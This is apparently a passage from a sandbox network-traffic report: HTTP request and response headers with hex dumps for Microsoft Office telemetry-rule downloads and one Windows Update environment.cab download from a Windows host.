                                                                                                                                                                                                2024-11-20 09:54:33 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                109192.168.2.74981313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:34 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                x-ms-request-id: 6d560277-a01e-0050-158c-3adb6e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095434Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a6000000000a3as
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:34 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                110192.168.2.74981413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:34 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                x-ms-request-id: 3044792c-001e-005a-088c-3ac3d0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095434Z-r1d97b99577ndm4rhC1TEBf0ps00000008w00000000034su
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:34 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                111192.168.2.74981513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:34 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1390
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                x-ms-request-id: c9275fb5-a01e-000d-708c-3ad1ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095434Z-185f5d8b95cdh56ghC1NYCk1x400000003ug00000000c7d9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:34 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                112192.168.2.74981713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:34 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095434Z-1777c6cb754gvvgfhC1TEBz4rg00000009m0000000000quu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:34 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                113192.168.2.74981813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:34 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                x-ms-request-id: c3eb962b-701e-003e-438c-3a79b3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095434Z-r1d97b99577sdxndhC1TEBec5n00000008t000000000a7b0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:34 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                114192.168.2.74981620.109.210.53443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:34 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hAemhKkDt5V6+5V&MD=5xMo73yv HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                2024-11-20 09:54:35 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                MS-CorrelationId: fed6e0cf-ee9c-43ac-a26a-b66e135f5ed3
                                                                                                                                                                                                MS-RequestId: b8716611-0111-4da4-9cd1-ce2c16e9b4ec
                                                                                                                                                                                                MS-CV: 83WpfPVDJkG1dM0V.0
                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                                                2024-11-20 09:54:35 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                2024-11-20 09:54:35 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                115192.168.2.74981913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1391
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                x-ms-request-id: c0af4880-401e-00ac-328c-3a0a97000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-185f5d8b95c96jn4hC1NYCbgp80000000a50000000000y0g
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:35 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                116192.168.2.74982013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1354
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                x-ms-request-id: 7ca1e40b-601e-003d-2f8c-3a6f25000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-185f5d8b95csp6jmhC1NYCwy6s00000009yg00000000d203
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:35 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                117192.168.2.74982313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                x-ms-request-id: 5a5a14b6-c01e-0079-438c-3ae51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-r1d97b99577656nchC1TEBk98c00000008v0000000000kuv
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
